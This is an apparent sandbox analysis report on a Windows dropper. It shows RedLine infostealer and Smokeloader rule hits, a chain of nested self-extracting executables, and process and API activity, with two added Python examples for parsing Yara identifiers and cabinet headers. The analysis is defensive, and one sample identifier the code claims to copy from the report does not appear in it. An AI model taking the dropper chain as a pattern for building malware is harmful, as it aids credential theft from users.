                      Source: 15.3.dvL76s65.exe.2c80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 1.3.kino0095.exe.4d2a220.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
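The Yara matches above name the same memory in two identifier styles: `<pid>.<stage>.<image>.<base>.<n>[.raw].unpack` for unpacked PE images and `<pid hex>.<stage>.<dump id>.<base>.<…>.sdmp` for raw memory dumps. Read by hand it is easy to miss that the Elastic Windows_Trojan_Smokeloader_3687686f rule fires in processes 0, 13 and 15 even though the report's verdict names only Amadey and RedLine; a rule hit outside the verdict is something to verify, not to dismiss. The following added example, which is not Joe Sandbox code, parses those identifiers and builds a rule-to-process matrix from a subset of the matches listed above. Its reading of the fifth and seventh dotted fields of the .sdmp names as Windows PAGE_* protection and MEM_* region type is an assumption, made because every value seen (0x40, 0x04; 0x20000, 0x40000, 0x1000000) coincides with those constants.

```python
"""Turn Joe Sandbox Yara 'Source:' identifiers into a rule -> process matrix.

Added example, not part of the Joe Sandbox report. Identifiers and rule names in
SAMPLE_MATCHES are copied from the report; decoding the 5th and 7th dotted
fields of .sdmp names as Windows PAGE_* / MEM_* constants is an ASSUMPTION."""
from __future__ import annotations

import re
from collections import defaultdict

# 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack -> pid . stage . image . base . index
UNPACK_RE = re.compile(r"^(?P<pid>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\."
                       r"(?P<base>[0-9a-fA-F]+)\.(?P<idx>\d+)(?:\.raw)?\.unpack$")
# 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp
SDMP_RE = re.compile(r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
                     r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
                     r"[0-9A-Fa-f]{8}\.(?P<type>[0-9A-Fa-f]{8})\.")
PAGE_PROTECT = {0x02: "R", 0x04: "RW", 0x20: "RX", 0x40: "RWX"}          # assumed meaning
MEM_TYPE = {0x20000: "private", 0x40000: "mapped", 0x1000000: "image"}   # assumed meaning

# (source identifier, matched rule) pairs copied from the report above.
SAMPLE_MATCHES = [
    ("15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack", "MALWARE_Win_RedLine"),
    ("13.2.con1332.exe.400000.0.raw.unpack", "MALWARE_Win_RedLine"),
    ("1.3.kino0095.exe.4d2a220.0.unpack", "MALWARE_Win_RedLine"),
    ("0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp", "MALWARE_Win_RedLine"),
    ("0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp", "MALWARE_Win_RedLine"),
    ("0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp", "Windows_Trojan_Smokeloader_3687686f"),
    ("0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp", "Windows_Trojan_Smokeloader_3687686f"),
    ("00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp", "Windows_Trojan_Smokeloader_3687686f"),
    ("0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp", "Windows_Trojan_RedLineStealer_ed346e4c"),
    ("0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp", "Windows_Trojan_RedLineStealer_ed346e4c"),
    ("00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp", "Windows_Trojan_RedLineStealer_ed346e4c"),
    (r"C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe", "MALWARE_Win_RedLine"),
]


def parse_source(src: str) -> dict:
    """Classify one 'Source:' identifier into kind/pid/image/base/protect/type."""
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpack", "pid": int(m["pid"]), "image": m["image"],
                "base": int(m["base"], 16), "protect": None, "type": None}
    m = SDMP_RE.match(src)
    if m:
        prot, typ = int(m["protect"], 16), int(m["type"], 16)
        return {"kind": "memory", "pid": int(m["pid"], 16), "image": None,
                "base": int(m["base"], 16),
                "protect": PAGE_PROTECT.get(prot, f"0x{prot:x}"),
                "type": MEM_TYPE.get(typ, f"0x{typ:x}")}
    if re.match(r"^[A-Za-z]:\\", src):
        return {"kind": "dropped", "pid": None, "image": src.rsplit("\\", 1)[-1],
                "base": None, "protect": None, "type": None}
    raise ValueError(f"unrecognised source identifier: {src}")


def rule_matrix(matches):
    """Return (rule -> sorted pids, rule -> dropped file names, pid -> image)."""
    rule_pids, rule_files, pid_image = defaultdict(set), defaultdict(set), {}
    for src, rule in matches:
        info = parse_source(src)
        if info["kind"] == "dropped":
            rule_files[rule].add(info["image"])
            continue
        rule_pids[rule].add(info["pid"])
        if info["image"]:
            pid_image[info["pid"]] = info["image"]
    return ({r: sorted(p) for r, p in rule_pids.items()},
            {r: sorted(f) for r, f in rule_files.items()}, pid_image)


def rules_outside_verdict(rule_pids, verdict=("Amadey", "RedLine")) -> list[str]:
    """Rules that fired but whose name matches none of the verdict families."""
    return sorted(r for r in rule_pids if not any(v.lower() in r.lower() for v in verdict))


def injected_code_regions(matches):
    """Memory-dump hits in RWX private memory: where the unpacked stage lives."""
    return sorted({(i["pid"], i["base"], rule) for src, rule in matches
                   for i in [parse_source(src)]
                   if i["kind"] == "memory" and i["protect"] == "RWX" and i["type"] == "private"})


if __name__ == "__main__":
    pids, files, images = rule_matrix(SAMPLE_MATCHES)
    for rule, ps in sorted(pids.items()):
        print(f"{rule}: pids {ps} {[images.get(p, '?') for p in ps]} files {files.get(rule, [])}")
    print("outside verdict:", rules_outside_verdict(pids))
```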
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00961F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00191F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: String function: 0040E1D8 appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: String function: 02BFE43F appears 44 times
                      Source: kino0095.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 712052 bytes, 2 files, at 0x2c +A "kino2456.exe" +A "en675431.exe", ID 1903, number 1, 28 datablocks, 0x1503 compression
                      Source: kino2456.exe.1.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 566384 bytes, 2 files, at 0x2c +A "kino0588.exe" +A "dvL76s65.exe", ID 2007, number 1, 24 datablocks, 0x1503 compression
                      Source: kino0588.exe.2.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 206926 bytes, 2 files, at 0x2c +A "bus9402.exe" +A "con1332.exe", ID 1794, number 1, 11 datablocks, 0x1503 compression
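Each kino*.exe above is a WEXTRACT/IExpress self-extractor whose payload is a Microsoft Cabinet stored as an RT_RCDATA resource, and the file(1)-style summary the report prints (total size, file count, first CFFILE at 0x2c, +A attributes, set ID, data-block count, compression code 0x1503) is read straight out of the CFHEADER, CFFOLDER and CFFILE structures. The following added example, not Joe Sandbox code, parses those structures from a cabinet blob so an analyst can list the embedded file names and the compression scheme without extracting anything. It builds a header-only cabinet for the demonstration: the names, set ID and compression code come from the first resource above, the file sizes are invented, and no CFDATA blocks are included.

```python
"""Parse the directory of a Microsoft Cabinet (MS-CAB) blob: CFHEADER, CFFOLDER
and CFFILE records. Added example for the RT_RCDATA findings above; the sample
cabinet is constructed (header-only, no CFDATA) and is not the sample's payload."""
from __future__ import annotations

import struct

CFHEADER = struct.Struct("<4s5I2B5H")   # 36 bytes
CFFOLDER = struct.Struct("<IHH")        # 8 bytes: coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")       # 16 bytes + NUL-terminated szName
RESERVE_PRESENT = 0x0004                # cfhdrRESERVE_PRESENT header flag
ATTR_FLAGS = ((0x01, "R"), (0x02, "H"), (0x04, "S"), (0x20, "A"), (0x40, "X"))
COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}


def is_cabinet(data: bytes) -> bool:
    return len(data) >= CFHEADER.size and data[:4] == b"MSCF"


def describe_compression(type_compress: int) -> str:
    """Low 4 bits select the codec; for LZX bits 8-12 carry the window size."""
    codec = COMPRESSION.get(type_compress & 0x0F, f"unknown({type_compress & 0x0F})")
    if codec == "LZX":
        codec += f":{(type_compress >> 8) & 0x1F}"
    return codec


def fmt_attribs(attribs: int) -> str:
    return "".join(f"+{c}" for bit, c in ATTR_FLAGS if attribs & bit) or "-"


def parse_cab(data: bytes) -> dict:
    if not is_cabinet(data):
        raise ValueError("not a Microsoft Cabinet (MSCF signature missing)")
    (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, v_minor, v_major,
     c_folders, c_files, flags, set_id, i_cabinet) = CFHEADER.unpack_from(data, 0)
    if cb_cabinet > len(data):
        raise ValueError(f"truncated: header claims {cb_cabinet} bytes, got {len(data)}")

    pos, folder_reserve = CFHEADER.size, 0
    if flags & RESERVE_PRESENT:          # optional per-header/folder/data reserve areas
        cb_hdr, cb_folder, _cb_data = struct.unpack_from("<HBB", data, pos)
        pos += 4 + cb_hdr
        folder_reserve = cb_folder

    folders = []
    for _ in range(c_folders):
        coff_start, c_cfdata, type_compress = CFFOLDER.unpack_from(data, pos)
        folders.append({"data_offset": coff_start, "data_blocks": c_cfdata,
                        "compression": describe_compression(type_compress)})
        pos += CFFOLDER.size + folder_reserve

    files, pos = [], coff_files
    for _ in range(c_files):
        if pos + CFFILE.size > len(data):
            raise ValueError("CFFILE table runs past end of data")
        cb_file, uoff, i_folder, _date, _time, attribs = CFFILE.unpack_from(data, pos)
        pos += CFFILE.size
        end = data.find(b"\0", pos)
        if end < 0:
            raise ValueError("unterminated CFFILE name")
        name = data[pos:end].decode("utf-8" if attribs & 0x80 else "cp437", errors="replace")
        pos = end + 1
        parts = name.replace("/", "\\").split("\\")
        files.append({"name": name, "size": cb_file, "folder_offset": uoff,
                      "folder": i_folder, "attribs": fmt_attribs(attribs),
                      # an extractor writing into a fixed directory must refuse these
                      "suspicious_path": name.startswith(("\\", "/")) or ".." in parts})
    return {"size": cb_cabinet, "version": f"{v_major}.{v_minor}", "set_id": set_id,
            "cabinet_index": i_cabinet, "first_file_offset": coff_files,
            "folders": folders, "files": files}


def build_sample_cab(entries, set_id=1903, type_compress=0x1503) -> bytes:
    """Constructed header-only cabinet (no CFDATA blocks) for demonstration."""
    file_table, uoff = b"", 0
    for name, size in entries:
        file_table += CFFILE.pack(size, uoff, 0, 0x5641, 0x6000, 0x20) + name.encode("cp437") + b"\0"
        uoff += size
    coff_files = CFHEADER.size + CFFOLDER.size          # 0x2c, as in the report
    total = coff_files + len(file_table)
    folder = CFFOLDER.pack(total, 0, type_compress)     # data would start here; 0 blocks
    header = CFHEADER.pack(b"MSCF", 0, total, 0, coff_files, 0, 3, 1,
                           1, len(entries), 0, set_id, 0)
    return header + folder + file_table


if __name__ == "__main__":
    cab = build_sample_cab([("kino2456.exe", 500000), ("en675431.exe", 200000)])
    info = parse_cab(cab)
    print(f"{info['size']} bytes, {len(info['files'])} files at 0x{info['first_file_offset']:x}, "
          f"ID {info['set_id']}, {info['folders'][0]['compression']}")
    for f in info["files"]:
        print(f"  {f['attribs']} {f['name']!r} {f['size']} bytes")
```

A cabinet carved from a real RT_RCDATA resource also carries the CFDATA blocks the folder entry counts; listing names and the compression scheme never requires decompressing them, which makes this a safe first look at a suspicious self-extractor before anything is executed or extracted.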
                      Source: szDGo5lHdI.exe | Binary or memory string: OriginalFilename vs szDGo5lHdI.exe
                      Source: szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs szDGo5lHdI.exe
                      Source: szDGo5lHdI.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: dvL76s65.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: con1332.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus9402.exe.log
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/11@0/1
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_0040597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Code function: 4_2_00007FFBACED1B10 ChangeServiceConfigA
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00404FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA
                      Source: szDGo5lHdI.exe | ReversingLabs: Detection: 46%
                      Source: szDGo5lHdI.exe | Virustotal: Detection: 44%
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\szDGo5lHdI.exe C:\Users\user\Desktop\szDGo5lHdI.exe
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00401F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_010B1F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00961F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00961F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00191F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00191F90
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_069027C6 CreateToolhelp32Snapshot,Module32First,0_2_069027C6
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Command line argument: Kernel32.dll 0_2_00402BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Command line argument: Kernel32.dll 1_2_010B2BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Command line argument: Kernel32.dll 2_2_00962BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Command line argument: Kernel32.dll 3_2_00192BFB
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Command line argument: 08A 13_2_00413780
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Automated click: OK
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Automated click: OK
                      Source: szDGo5lHdI.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: szDGo5lHdI.exe | Static file information: File size 1228288 > 1048576
                      Source: szDGo5lHdI.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106a00
                      Source: szDGo5lHdI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: szDGo5lHdI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: szDGo5lHdI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: szDGo5lHdI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: szDGo5lHdI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: szDGo5lHdI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
